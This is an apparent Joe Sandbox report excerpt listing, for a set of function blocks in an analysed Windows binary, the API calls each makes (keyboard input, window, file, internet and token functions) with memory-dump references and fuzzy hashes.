                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D412770F44208AEEF208B64CC09BFDBBBE9B55320F04011AE4C1922C1C7B88E85F761
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F0E742
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00F0E768
                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F0E78D
                                                                                                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F0E7B9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3321077145-0
                                                                                                                                                                                                                                                      • Opcode ID: 4468b05e2928fe7073a1036074f44a7ef5027846f0ba4d1d35a5d29606e961b2
                                                                                                                                                                                                                                                      • Instruction ID: 102353ad017e8948e22b1c488a36f34c8e1715deb600e4b2533f79e8df3834ae
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4468b05e2928fe7073a1036074f44a7ef5027846f0ba4d1d35a5d29606e961b2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17414739600610DFCF11EF18C544A5DBBE5FF99720B098498E916AB3A2CB75FD01EB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F2B5D1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InvalidateRect
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 634782764-0
                                                                                                                                                                                                                                                      • Opcode ID: 518f14f71712557a1c4ef348099c02bf4702407b883c1a57a4bebdd907cfd528
                                                                                                                                                                                                                                                      • Instruction ID: 5d3344422e142ebb140a949de5067504daf194ebb4d07cc562911b03795764cb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 518f14f71712557a1c4ef348099c02bf4702407b883c1a57a4bebdd907cfd528
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3531C775A01128BFEF209F58EC86FE87BA5EB06320F584551FE51DA2E1D730E940BB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 00F2D807
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00F2D87D
                                                                                                                                                                                                                                                      • PtInRect.USER32(?,?,00F2ED5A), ref: 00F2D88D
                                                                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 00F2D8FE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: 3ac1142b930bf0f975c3a176ec01718fd0579dfe71bbde014ae26b2a7bd352c2
• Instruction ID: 09f230919393357ce8257e6dadeb2efd4665e5fa158cb48034ce4458ff67f915
• Opcode Fuzzy Hash: 3ac1142b930bf0f975c3a176ec01718fd0579dfe71bbde014ae26b2a7bd352c2
• Instruction Fuzzy Hash: EB41AD75E00228DFCB15DF58E884BE97BF5FF49361F1882A9E8549B260D730E945EB40
APIs
• GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00F03AB8
• SetKeyboardState.USER32(00000080,?,00008000), ref: 00F03AD4
• PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00F03B34
• SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00F03B92
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 1c9787c1bec99739b4595706d189ccac8c8dc92c1192712d32d7605ab4e0bf4f
• Instruction ID: 6318a2b5bf40cb34a9b4877af606e4bdd87ce9f72436ea7570aa578f7b720869
• Opcode Fuzzy Hash: 1c9787c1bec99739b4595706d189ccac8c8dc92c1192712d32d7605ab4e0bf4f
• Instruction Fuzzy Hash: 1D31F8B1E40258AEEF218B64CC197FD7BAD9B96328F04015AE881931D1C7788F45F761
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EF4038
• __isleadbyte_l.LIBCMT ref: 00EF4066
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00EF4094
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00EF40CA
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: f64fce4fa6982de990a43385436a15b4942262b28054c0a5c19cce497e5489b4
• Instruction ID: c63a6f35c91fea1e3ed68f57fd1f7eb91f0f41035747f459ecf5d9ea3ee56733
• Opcode Fuzzy Hash: f64fce4fa6982de990a43385436a15b4942262b28054c0a5c19cce497e5489b4
• Instruction Fuzzy Hash: C231EF7060020AAFDB219F24C844BBB7BE5BF40314F155028EB64AB0E1EB31D890DB92
APIs
• GetForegroundWindow.USER32 ref: 00F27CB9
  • Part of subcall function 00F05F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F05F6F
  • Part of subcall function 00F05F55: GetCurrentThreadId.KERNEL32 ref: 00F05F76
  • Part of subcall function 00F05F55: AttachThreadInput.USER32(00000000,?,00F0781F), ref: 00F05F7D
• GetCaretPos.USER32(?), ref: 00F27CCA
• ClientToScreen.USER32(00000000,?), ref: 00F27D03
• GetForegroundWindow.USER32 ref: 00F27D09
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: c42447c8671c230cb5fb2cf94b2b56ead406443dbad7f4dd43884810ac662705
• Instruction ID: 80a071c9ec86719cd0f3e98d1d272b87f241eb861d59f463ae7d6ad1b4bebfb8
• Opcode Fuzzy Hash: c42447c8671c230cb5fb2cf94b2b56ead406443dbad7f4dd43884810ac662705
• Instruction Fuzzy Hash: 4A311E76900108AFDB00EFA5DC459EFFBF9EF94310B10946AE915E3211DA359E059BA0
APIs
  • Part of subcall function 00EDB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EDB35F
• GetCursorPos.USER32(?), ref: 00F2F211
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F3E4C0,?,?,?,?,?), ref: 00F2F226
• GetCursorPos.USER32(?), ref: 00F2F270
• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F3E4C0,?,?,?), ref: 00F2F2A6
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2864067406-0
                                                                                                                                                                                                                                                      • Opcode ID: b461a578bf4a680304742eaff21e8588f09be9ff87d23d856bc4274c04618274
                                                                                                                                                                                                                                                      • Instruction ID: 9ea299a3e69d65e122bf9951f5494135e390cd2adf6c2ca66ca684fef20b2314
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b461a578bf4a680304742eaff21e8588f09be9ff87d23d856bc4274c04618274
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC217E39A10028EFCB159F94E858EFA7BB9FF0A720F184179F9059B2A1D7309951EB50
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F14358
  • Part of subcall function 00F143E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F14401
  • Part of subcall function 00F143E2: InternetCloseHandle.WININET(00000000), ref: 00F1449E
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Internet$CloseConnectHandleOpen
• String ID:
• API String ID: 1463438336-0
• Opcode ID: dbad58b844b3adeb3b676e89c1f6035950cfcf1ff7e54346fd133d25aad084f0
• Instruction ID: 6f829e1f47d8dc482b961274dcf6790949a2987695356dc0656ceb136b4f895c
• Opcode Fuzzy Hash: dbad58b844b3adeb3b676e89c1f6035950cfcf1ff7e54346fd133d25aad084f0
• Instruction Fuzzy Hash: 8E21C636600605BFEB159F60DC00FFBBBA9FFD8710F10401AFA2596650D775A8A1BB90
APIs
• select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00F18AE0
• __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00F18AF2
• accept.WSOCK32(00000000,00000000,00000000), ref: 00F18AFF
• WSAGetLastError.WSOCK32(00000000), ref: 00F18B16
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ErrorLastacceptselect
• String ID:
• API String ID: 385091864-0
• Opcode ID: ebe7a0ddb2e121ea2de162172a2e11113a484ebd974a3754e11f446ccd7aafae
• Instruction ID: 14ef8847fc549560d3f8618f21acfb890bf8cfd721bc9e78099454fb3f16849b
• Opcode Fuzzy Hash: ebe7a0ddb2e121ea2de162172a2e11113a484ebd974a3754e11f446ccd7aafae
• Instruction Fuzzy Hash: 70219376A001249FC711DF68DD85ADEBBECEF9A350F00416AF849E7290DB749E819F90
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 00F28AA6
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F28AC0
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00F28ACE
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00F28ADC
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
• Opcode ID: cf45a73d5e14220eb53305887a582db896792d06c75ac5feeee2cfdffb0d8efa
• Instruction ID: 86873f87bfb8b683d931add2d93687f359c5e0e267d3e56c4f6137b105dac749
• Opcode Fuzzy Hash: cf45a73d5e14220eb53305887a582db896792d06c75ac5feeee2cfdffb0d8efa
• Instruction Fuzzy Hash: 6D11EE31306124AFDB04AB28DC05FBA77D9AF86320F14411EF916D72E1CF75AC029B90
APIs
  • Part of subcall function 00F01E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00F00ABB,?,?,?,00F0187A,00000000,000000EF,00000119,?,?), ref: 00F01E77
  • Part of subcall function 00F01E68: lstrcpyW.KERNEL32(00000000,?,?,00F00ABB,?,?,?,00F0187A,00000000,000000EF,00000119,?,?,00000000), ref: 00F01E9D
  • Part of subcall function 00F01E68: lstrcmpiW.KERNEL32(00000000,?,00F00ABB,?,?,?,00F0187A,00000000,000000EF,00000119,?,?), ref: 00F01ECE
• lstrlenW.KERNEL32(?,00000002,?,?,?,?,00F0187A,00000000,000000EF,00000119,?,?,00000000), ref: 00F00AD4
• lstrcpyW.KERNEL32(00000000,?,?,00F0187A,00000000,000000EF,00000119,?,?,00000000), ref: 00F00AFA
• lstrcmpiW.KERNEL32(00000002,cdecl,?,00F0187A,00000000,000000EF,00000119,?,?,00000000), ref: 00F00B2E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: lstrcmpilstrcpylstrlen
• String ID: cdecl
• API String ID: 4031866154-3896280584
• Opcode ID: 87a8755a9b0dcee29f8cc87805f9419ddb38d3d13a58482f3d1397fe1d8ccfc3
• Instruction ID: 477a478d6a0a4532cbde6fc1503f467e7b3d5442252c118625f143df9c65b61c
• Opcode Fuzzy Hash: 87a8755a9b0dcee29f8cc87805f9419ddb38d3d13a58482f3d1397fe1d8ccfc3
• Instruction Fuzzy Hash: B6118E7A200305AFDB25AF24DC45E7A77A8FF85364F80406AE806CB290EF719851E7A1
APIs
• _free.LIBCMT ref: 00EF2FB5
  • Part of subcall function 00EE395C: __FF_MSGBANNER.LIBCMT ref: 00EE3973
  • Part of subcall function 00EE395C: __NMSG_WRITE.LIBCMT ref: 00EE397A
  • Part of subcall function 00EE395C: RtlAllocateHeap.NTDLL(01120000,00000000,00000001,00000001,00000000,?,?,00EDF507,?,0000000E), ref: 00EE399F
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 614378929-0
                                                                                                                                                                                                                                                      • Opcode ID: fdf1e32d10b8978661f5e2f97734398c3568bc098b34c57249db6a564ffeabfe
                                                                                                                                                                                                                                                      • Instruction ID: 7cb96c43833fc54da7e10c391df2ff01f6aab20296f111e818e7029786cd984b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fdf1e32d10b8978661f5e2f97734398c3568bc098b34c57249db6a564ffeabfe
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C110A3260825EABCB313F71AC046797BD8AF54364F30652AFA49FA251DF30C9409790
APIs
• _memset.LIBCMT ref: 00EDEBB2
  • Part of subcall function 00EC51AF: _memset.LIBCMT ref: 00EC522F
  • Part of subcall function 00EC51AF: _wcscpy.LIBCMT ref: 00EC5283
  • Part of subcall function 00EC51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00EC5293
• KillTimer.USER32(?,00000001,?,?), ref: 00EDEC07
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EDEC16
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F33C88
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
• Opcode ID: 107c479566a124b8ee881fd129ec50b371be72c547db0e1ca3b7fd12473e6e17
• Instruction ID: cd0f37b2ecf9389c8ca7f2ad61b26c0ad7e9600403dff37e5ee50e366f8e2b30
• Opcode Fuzzy Hash: 107c479566a124b8ee881fd129ec50b371be72c547db0e1ca3b7fd12473e6e17
• Instruction Fuzzy Hash: 8D21DA759047949FE733D7248C59BEBFBEC9B11318F04144DE68A6A341C3742A85DB51
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00F005AC
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00F005C7
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00F005DD
• FreeLibrary.KERNEL32(?), ref: 00F00632
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Type$FileFreeLibraryLoadModuleNameRegister
• String ID:
• API String ID: 3137044355-0
• Opcode ID: e3318d2e97883306df17a76c80336a69d26e7c0b949307223dc741606b986880
• Instruction ID: f3f64adad5d1e28ecd290da10c651979580416387dd2c95581586039a1957b1a
• Opcode Fuzzy Hash: e3318d2e97883306df17a76c80336a69d26e7c0b949307223dc741606b986880
• Instruction Fuzzy Hash: 09217F71940209EFDB208F91DC88BEABBB9EF80704F008469E91692190DF75EA55FF51
APIs
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00F06733
• _memset.LIBCMT ref: 00F06754
• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00F067A6
• CloseHandle.KERNEL32(00000000), ref: 00F067AF
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle_memset
• String ID:
• API String ID: 1157408455-0
• Opcode ID: 8f6d160e9641d7b1d8928ad8349fed98436b9de87c2005969697c6935bff730f
• Instruction ID: dd2282d647533f6250d016080afac49ae34a9182f5b8c6f91de1d1526016fca8
• Opcode Fuzzy Hash: 8f6d160e9641d7b1d8928ad8349fed98436b9de87c2005969697c6935bff730f
• Instruction Fuzzy Hash: 4D110A76D0122C7AE7205BA5AC4DFABBABCEF45B64F10419AF904E71C0D7704F809B64
APIs
  • Part of subcall function 00EFAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EFAA79
  • Part of subcall function 00EFAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EFAA83
  • Part of subcall function 00EFAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EFAA92
  • Part of subcall function 00EFAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EFAA99
  • Part of subcall function 00EFAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EFAAAF
• GetLengthSid.ADVAPI32(?,00000000,00EFADE4,?,?), ref: 00EFB21B
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 00EFB227
• HeapAlloc.KERNEL32(00000000), ref: 00EFB22E
• CopySid.ADVAPI32(?,00000000,?), ref: 00EFB247
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4217664535-0
                                                                                                                                                                                                                                                      • Opcode ID: ae9b4f2c7e8c42e5558f863520d77258a3763becb8c0f98c3e1843770bab6ade
                                                                                                                                                                                                                                                      • Instruction ID: df9b81e8bddc932f9a4dea4f0f4973331de337ad2d260eab7866fb0c4f8fa628
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae9b4f2c7e8c42e5558f863520d77258a3763becb8c0f98c3e1843770bab6ade
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF119475A0020DEFEB149F58DC95ABFB7A9EF95308F14902DEA46A7220D7319E44DB10
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00EFB498
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EFB4AA
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EFB4C0
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EFB4DB
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
